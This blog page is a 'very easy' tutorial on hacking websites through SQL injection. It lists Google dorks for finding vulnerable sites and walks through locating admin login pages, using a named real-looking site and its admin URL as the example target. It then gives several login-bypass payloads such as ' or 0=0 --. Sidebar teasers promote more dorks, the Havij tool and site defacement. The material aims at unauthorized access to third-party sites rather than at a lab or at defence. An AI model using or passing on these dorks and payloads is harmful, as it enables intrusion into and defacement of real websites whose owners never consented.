Skip to main content

Simple Sql Injection Tutorial How To Hack Web Site with Sql Strings/Sql Injection [very easy]

                           What Is Sql Injection?



SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.


Requirements :

  • First we need to find Sites for Hacking if we have to hack sites we must need to know how to find sites

Basically we use Dorks for Find Sites

some google dorks:
  1. "inurl:admin.asp"
  2. inurl:adminlogin.asp
  3. inurl:login/admin.asp
  4. inurl:read.php?=

  5. inurl:”ViewerFrame?Mode=”

  6. inurl:index.php?id=

  7. inurl:trainers.php?id=

  8. inurl:buy.php?category=
  9. inurl:article.php?ID=

now open google.com and copy any one dork form here and paste that on google and click search, you will get many SQL vunerablee sites

so we Found Sites Now we need to Find Admin Login Page of a Site.

now open sites one by one. and you will got admin login page.

Now we have done 2 step 1 is find vuln sites and 2nd is Find Admin login

Now Come to Main tutorial about Sql strings/injection

what is sql strings?

when we put sql string in admin login then login penal cant handle the queries and redrict you into admin area.

For Example i found a Site: http://www.roseandcrownrangeworthy.co.uk

and i found admin login panel: http://www.roseandcrownrangeworthy.co.uk/admin-home.asp

1st i tried username :admin and password: admin but i did not enter

but after i enter username: admin and password :   ′or’1′=’1
if the password not works try others passwords:

  • 'or'x'='x
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #


Thats it Guys if you getting Problem plz Comment or contact with me

Comments

Popular posts from this blog

World Largest SQL Google Dork Colection

 inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num=

Hack WebSite’s Admin login Using Havij Sql Injection Tool Full Detailed with Example Sites and ScreenShots

Hi Friends in this Tutorial i will Tell you How to Hack Web Sites With  Sql Injection  tool, there are hug of sql vulnerable sites available for deface.. You Can Learn Step by Step this Tutorials. I made this Tutorial with alot of details and examples.

Make Deface Pages For Hacking Sites With Two MethoD

1st Method!!! In this Method i will tell you how to make Deface page With Advance Deface page Creator Tool